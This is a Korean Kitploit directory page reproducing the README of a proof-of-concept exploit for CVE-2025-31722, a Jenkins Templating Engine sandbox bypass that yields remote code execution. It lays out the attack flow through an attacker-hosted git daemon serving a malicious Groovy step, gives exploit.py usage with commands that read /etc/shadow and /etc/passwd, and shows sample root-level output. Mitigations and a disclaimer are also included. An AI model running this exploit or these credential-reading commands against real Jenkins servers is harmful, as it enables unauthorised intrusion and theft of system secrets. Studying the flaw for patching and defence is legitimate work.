Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-31722 — CVE-2025-31722 — Jenkins Templating Engine RCE | Kitploit
도구/GitHubGitHub/h3raklez/cve-2025-31722
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubh3raklez/cve-2025-31722

CVE-2025-31722

CVE-2025-31722 — Jenkins Templating Engine RCE

저장소 보기
5개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-31722 — Jenkins 템플릿 엔진 RCE

교육 및 승인된 보안 연구 목적으로만 사용하세요.

설명

Jenkins Templating Engine (JTE) 플러그인 <= 2.5.3에서 발생하는 샌드박스 우회 취약점으로, 낮은 권한의 사용자가 Jenkins 서버에서 임의 코드를 실행할 수 있습니다.

이 결함은 JTE가 폴더 수준의 GovernanceTier 설정에 정의된 외부 git 저장소에서 라이브러리를 로드하고, 해당 라이브러리의 단계를 작업을 생성한 사용자의 권한 수준에 관계없이 Groovy 샌드박스 외부에서 실행하기 때문에 발생합니다.

CVSS: 8.8 (높음)
유형: 샌드박스 우회 → RCE
영향받는 구성 요소: pipeline-templating-engine 플러그인 ≤ 2.5.3
수정 버전: 2.5.4+


공격 흐름

root@kitploit:~
공격자 (Kali)                          Jenkins 서버
───────────────                          ──────────────
1. evil.groovy가 포함된 git 저장소 생성
2. :9418 포트에서 git 데몬 시작
3. Jenkins에 폴더 생성        →    GovernanceTier가 있는 폴더
   git://KALI:9418/…를 가리킴         공격자의 저장소를 가리킴
4. AdHoc 템플릿으로 작업 생성  →    작업이 evil() 호출
5. 빌드 트리거                   →    JTE가 Kali에서 저장소 복제
                                         샌드박스 외부에서 evil() 실행
                                    ←    Jenkins 사용자로 RCE

요구 사항

Jenkins 서버 (대상)

  • Templating Engine 2.5.3 플러그인이 설치된 Jenkins
  • 플러그인: cloudbees-folder, git, workflow-aggregator
  • CSRF 비활성화
  • 사용자 attacker 권한: Item/READ, Item/CREATE, Item/CONFIGURE, Item/BUILD
  • 기본 제공 노드가 온라인 상태이며 최소 1개의 실행기 보유
  • 서버에서 공격자 IP의 9418 포트로 아웃바운드 네트워크 연결 가능

공격자 머신 (Kali)

  • Python 3.8+
  • git 설치
  • Jenkins 서버에서 9418 포트에 접근 가능
  • Python 라이브러리: requests
root@kitploit:~
pip install requests

실습 환경 설정

Debian/Ubuntu 서버에 설치된 설정은 Jenkins, 사용자, 권한 및 필요한 플러그인을 구성합니다. 악성 콘텐츠를 생성하지 않습니다 — 이는 PoC에서만 처리됩니다.


사용법

기본 익스플로잇

root@kitploit:~
python3 exploit.py \
  --url http://<JENKINS-IP>:8080 \
  --user attacker \
  --pass attacker123 \
  --git-host <KALI-IP>

사용자 지정 명령어

root@kitploit:~
python3 exploit.py \
  --url http://<JENKINS-IP>:8080 \
  --user attacker \
  --pass attacker123 \
  --git-host <KALI-IP> \
  --cmd "cat /etc/shadow"

정리

root@kitploit:~
python3 exploit.py \
  --url http://<JENKINS-IP>:8080 \
  --user attacker \
  --pass attacker123 \
  --git-host <KALI-IP> \
  --cleanup

매개변수


PoC 작동 방식

  1. setup_repo() — 실행할 명령어가 포함된 ~/jte-exploit/evil-lib/steps/evil.groovy를 Kali에 생성
  2. start_git_daemon() — Kali의 9418 포트에서 git daemon 시작
  3. create_folder() — git://KALI:9418/jte-exploit를 가리키는 GovernanceTier가 있는 폴더를 Jenkins에 생성
  4. create_job() — evil-lib을 선언하고 evil()을 호출하는 AdHocTemplateFlowDefinition을 사용한 작업 생성
  5. trigger_and_wait() — 빌드를 트리거하고 결과를 기다림
  6. print_output() — RCE 결과가 포함된 콘솔 출력 표시

git 데몬은 전체 빌드 주기 동안 활성 상태를 유지하며 빌드가 완료되면 자동으로 종료됩니다.


예상 출력

root@kitploit:~
=================================================================
  CVE-2025-31722 — Jenkins 템플릿 엔진 RCE
  대상  : http://10.211.55.10:8080
  Git 호스트: 10.211.55.7
  명령어 : id && hostname && cat /etc/passwd
=================================================================

[+] 인증됨: attacker (id=attacker)
[+] 저장소 생성됨: /root/jte-exploit
[+] 악성 단계: evil-lib/steps/evil.groovy
[+] Git 데몬 실행 중: git://10.211.55.7:9418/jte-exploit
[+] 폴더 생성됨
[+] 작업 생성됨
[+] 빌드 대기 중

=================================================================
  CVE-2025-31722 — RCE 출력
=================================================================
[JTE] ...
uid=0(root) gid=0(root) groups=0(root)
debian
root:x:0:0:root:/root:/bin/bash
...
=================================================================

완화 방안

  • Templating Engine 플러그인을 2.5.4 이상으로 업데이트
  • Item/CREATE 및 Item/CONFIGURE 권한을 신뢰할 수 있는 사용자로만 제한
  • Jenkins에서 CSRF 보호 활성화
  • 외부 저장소를 가리키는 GovernanceTier 설정이 있는 폴더 감사

참고 자료

  • Jenkins 보안 권고
  • JTE 플러그인 GitHub

법적 고지: 이 PoC는 교육 목적 및 통제된 환경에서의 테스트만을 위한 것입니다. 명시적 승인 없이 시스템에 사용하는 것은 불법입니다.

도구 다운로드
매개변수설명필수
--urlJenkins 기본 URL예
--userItem/CREATE+CONFIGURE+BUILD 권한을 가진 사용자예
--pass사용자 비밀번호예
--git-hostJenkins에서 접근 가능한 Kali IP예
--cmd서버에서 실행할 명령어 (기본값: id && hostname && cat /etc/passwd)아니요
--cleanup익스플로잇이 생성한 폴더, 작업 및 저장소 삭제아니요